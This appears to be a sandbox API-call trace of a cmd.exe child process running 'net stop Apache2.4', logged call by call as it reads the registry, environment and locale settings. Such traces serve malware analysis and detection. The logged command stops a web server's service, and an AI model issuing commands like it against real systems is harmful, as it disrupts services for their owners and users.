"child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c net stop Apache2.4" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 51 os_tid = 0x804 [0068.845] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2aff4c | out: lpSystemTimeAsFileTime=0x2aff4c*(dwLowDateTime=0x97e11d90, dwHighDateTime=0x1d57b18)) [0068.845] GetCurrentProcessId () returned 0x80c [0068.845] GetCurrentThreadId () returned 0x804 [0068.845] GetTickCount () returned 0x114b2dc [0068.845] QueryPerformanceCounter (in: lpPerformanceCount=0x2aff44 | out: lpPerformanceCount=0x2aff44*=18906684975) returned 1 [0068.846] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0068.846] __set_app_type (_Type=0x1) [0068.846] __p__fmode () returned 0x74eb31f4 [0068.846] __p__commode () returned 0x74eb31fc [0068.847] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0068.847] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0068.847] GetCurrentThreadId () returned 0x804 [0068.847] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x804) returned 0x60 [0068.847] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0068.847] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0068.847] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.847] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.847] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afedc | out: phkResult=0x2afedc*=0x0) returned 0x2 [0068.848] VirtualQuery (in: lpAddress=0x2aff13, lpBuffer=0x2afeac, dwLength=0x1c | out: lpBuffer=0x2afeac*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.848] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afeac, dwLength=0x1c | out: lpBuffer=0x2afeac*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.848] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afeac, dwLength=0x1c | out: lpBuffer=0x2afeac*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.848] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afeac, dwLength=0x1c | out: lpBuffer=0x2afeac*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.848] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afeac, dwLength=0x1c | out: lpBuffer=0x2afeac*(BaseAddress=0x2b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x120000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0068.848] GetConsoleOutputCP () returned 0x1b5 [0068.848] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0068.848] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0068.848] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.848] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0068.848] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.848] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0068.848] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.848] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.849] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.849] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0068.849] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.849] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0068.849] GetEnvironmentStringsW () returned 0x582030* [0068.849] GetProcessHeap () returned 0x570000 [0068.849] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xaca) returned 0x582b08 [0068.849] FreeEnvironmentStringsW (penv=0x582030) returned 1 [0068.850] GetProcessHeap () returned 0x570000 [0068.850] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x4) returned 0x580c60 [0068.850] GetEnvironmentStringsW () returned 0x582030* [0068.850] GetProcessHeap () returned 0x570000 [0068.850] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xaca) returned 0x5835e0 [0068.850] FreeEnvironmentStringsW (penv=0x582030) returned 1 [0068.850] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aee4c | out: phkResult=0x2aee4c*=0x68) returned 0x0 [0068.850] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aee54, lpData=0x2aee58, lpcbData=0x2aee50*=0x1000 | out: lpType=0x2aee54*=0x0, lpData=0x2aee58*=0x0, lpcbData=0x2aee50*=0x1000) returned 0x2 [0068.850] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aee54, lpData=0x2aee58, lpcbData=0x2aee50*=0x1000 | out: lpType=0x2aee54*=0x4, lpData=0x2aee58*=0x1, lpcbData=0x2aee50*=0x4) returned 0x0 [0068.850] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aee54, lpData=0x2aee58, lpcbData=0x2aee50*=0x1000 | out: lpType=0x2aee54*=0x0, lpData=0x2aee58*=0x1, lpcbData=0x2aee50*=0x1000) returned 0x2 [0068.850] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aee54, lpData=0x2aee58, lpcbData=0x2aee50*=0x1000 | out: lpType=0x2aee54*=0x4, lpData=0x2aee58*=0x0, lpcbData=0x2aee50*=0x4) returned 0x0 [0068.850] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aee54, lpData=0x2aee58, lpcbData=0x2aee50*=0x1000 | out: lpType=0x2aee54*=0x4, lpData=0x2aee58*=0x40, lpcbData=0x2aee50*=0x4) returned 0x0 [0068.850] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aee54, lpData=0x2aee58, lpcbData=0x2aee50*=0x1000 | out: lpType=0x2aee54*=0x4, lpData=0x2aee58*=0x40, lpcbData=0x2aee50*=0x4) returned 0x0 [0068.850] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aee54, lpData=0x2aee58, lpcbData=0x2aee50*=0x1000 | out: lpType=0x2aee54*=0x0, lpData=0x2aee58*=0x40, lpcbData=0x2aee50*=0x1000) returned 0x2 [0068.850] RegCloseKey (hKey=0x68) returned 0x0 [0068.850] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aee4c | out: phkResult=0x2aee4c*=0x68) returned 0x0 [0068.850] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aee54, lpData=0x2aee58, lpcbData=0x2aee50*=0x1000 | out: lpType=0x2aee54*=0x0, lpData=0x2aee58*=0x40, lpcbData=0x2aee50*=0x1000) returned 0x2 [0068.851] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aee54, lpData=0x2aee58, lpcbData=0x2aee50*=0x1000 | out: lpType=0x2aee54*=0x4, lpData=0x2aee58*=0x1, lpcbData=0x2aee50*=0x4) returned 0x0 [0068.851] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aee54, lpData=0x2aee58, lpcbData=0x2aee50*=0x1000 | out: lpType=0x2aee54*=0x0, lpData=0x2aee58*=0x1, lpcbData=0x2aee50*=0x1000) returned 0x2 [0068.851] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aee54, lpData=0x2aee58, lpcbData=0x2aee50*=0x1000 | out: lpType=0x2aee54*=0x4, lpData=0x2aee58*=0x0, lpcbData=0x2aee50*=0x4) returned 0x0 [0068.851] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aee54, lpData=0x2aee58, lpcbData=0x2aee50*=0x1000 | out: lpType=0x2aee54*=0x4, lpData=0x2aee58*=0x9, lpcbData=0x2aee50*=0x4) returned 0x0 [0068.851] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aee54, lpData=0x2aee58, lpcbData=0x2aee50*=0x1000 | out: lpType=0x2aee54*=0x4, lpData=0x2aee58*=0x9, lpcbData=0x2aee50*=0x4) returned 0x0 [0068.851] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aee54, lpData=0x2aee58, lpcbData=0x2aee50*=0x1000 | out: lpType=0x2aee54*=0x0, lpData=0x2aee58*=0x9, lpcbData=0x2aee50*=0x1000) returned 0x2 [0068.851] RegCloseKey (hKey=0x68) returned 0x0 [0068.851] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebb3 [0068.851] srand (_Seed=0x5d97ebb3) [0068.851] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop Apache2.4" [0068.851] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop Apache2.4" [0068.851] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.851] GetProcessHeap () returned 0x570000 [0068.851] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x210) returned 0x582030 [0068.851] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x582038, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0068.851] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.852] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.852] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.852] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0068.852] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0068.852] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0068.852] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0068.852] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0068.852] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0068.852] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0068.852] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.852] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0068.852] GetProcessHeap () returned 0x570000 [0068.852] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x582b08 | out: hHeap=0x570000) returned 1 [0068.852] GetEnvironmentStringsW () returned 0x582248* [0068.852] GetProcessHeap () returned 0x570000 [0068.852] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xae2) returned 0x584ba8 [0068.852] FreeEnvironmentStringsW (penv=0x582248) returned 1 [0068.852] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0068.852] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.852] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0068.852] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0068.852] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0068.852] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0068.852] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0068.852] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0068.852] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0068.852] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0068.852] GetProcessHeap () returned 0x570000 [0068.852] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x54) returned 0x585698 [0068.852] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2afc18 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.853] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2afc18, lpFilePart=0x2afc14 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2afc14*="Desktop") returned 0x25 [0068.853] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.853] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af994 | out: lpFindFileData=0x2af994*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x581eb0 [0068.853] FindClose (in: hFindFile=0x581eb0 | out: hFindFile=0x581eb0) returned 1 [0068.853] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2af994 | out: lpFindFileData=0x2af994*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x963e2b90, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x963e2b90, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x581eb0 [0068.853] FindClose (in: hFindFile=0x581eb0 | out: hFindFile=0x581eb0) returned 1 [0068.853] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0068.853] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2af994 | out: lpFindFileData=0x2af994*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x581eb0 [0068.853] FindClose (in: hFindFile=0x581eb0 | out: hFindFile=0x581eb0) returned 1 [0068.853] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.853] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0068.853] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0068.853] GetProcessHeap () returned 0x570000 [0068.853] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584ba8 | out: hHeap=0x570000) returned 1 [0068.853] GetEnvironmentStringsW () returned 0x5840b8* [0068.854] GetProcessHeap () returned 0x570000 [0068.854] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb36) returned 0x585ef8 [0068.854] FreeEnvironmentStringsW (penv=0x5840b8) returned 1 [0068.854] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.854] GetProcessHeap () returned 0x570000 [0068.854] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x585698 | out: hHeap=0x570000) returned 1 [0069.424] GetProcessHeap () returned 0x570000 [0069.424] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x400e) returned 0x586a38 [0069.424] GetProcessHeap () returned 0x570000 [0069.424] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x32) returned 0x581eb0 [0069.424] GetProcessHeap () returned 0x570000 [0069.424] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x586a38 | out: hHeap=0x570000) returned 1 [0069.424] GetConsoleOutputCP () returned 0x1b5 [0069.424] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.424] GetUserDefaultLCID () returned 0x409 [0069.425] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0069.425] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afd58, cchData=128 | out: lpLCData="0") returned 2 [0069.425] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afd58, cchData=128 | out: lpLCData="0") returned 2 [0069.425] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afd58, cchData=128 | out: lpLCData="1") returned 2 [0069.425] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0069.425] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0069.426] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0069.426] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0069.426] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0069.426] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0069.426] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0069.426] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0069.426] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0069.426] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0069.426] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0069.427] GetProcessHeap () returned 0x570000 [0069.427] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20c) returned 0x582dc0 [0069.427] GetConsoleTitleW (in: lpConsoleTitle=0x582dc0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.427] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.427] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0069.427] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0069.427] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0069.428] GetProcessHeap () returned 0x570000 [0069.428] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x400a) returned 0x586a38 [0069.428] GetProcessHeap () returned 0x570000 [0069.428] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x586a38 | out: hHeap=0x570000) returned 1 [0069.428] _wcsicmp (_String1="net", _String2=")") returned 69 [0069.428] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0069.428] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0069.428] _wcsicmp (_String1="IF", _String2="net") returned -5 [0069.428] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0069.428] _wcsicmp (_String1="REM", _String2="net") returned 4 [0069.428] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0069.428] GetProcessHeap () returned 0x570000 [0069.428] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x58) returned 0x582fd8 [0069.428] GetProcessHeap () returned 0x570000 [0069.428] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x10) returned 0x57ff00 [0069.429] GetProcessHeap () returned 0x570000 [0069.429] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x28) returned 0x583038 [0069.429] GetConsoleTitleW (in: lpConsoleTitle=0x2afa50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.430] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.430] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.430] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.430] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.430] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.430] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.430] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.430] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.430] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.430] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.430] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.430] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.430] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.430] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.430] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.430] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.430] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.430] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.430] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.430] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.430] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.430] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.430] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.430] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.430] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.430] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.430] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.430] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.430] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.430] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.430] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.430] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.431] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.431] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.431] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.431] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.431] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.431] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.431] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.431] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.431] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.431] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.431] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.431] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.431] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.431] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.431] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.431] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.431] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.431] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.431] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.431] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.431] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.431] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.431] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.431] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.431] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.431] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.431] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.431] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.431] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.431] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.431] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.431] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.431] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.431] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.432] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.432] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.432] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.432] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.432] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.432] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.432] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.432] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.432] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.432] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.432] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.432] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.432] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.432] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.432] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.432] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.432] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.432] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.432] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0069.432] _wcsicmp (_String1="net", _String2="IF") returned 5 [0069.432] _wcsicmp (_String1="net", _String2="REM") returned -4 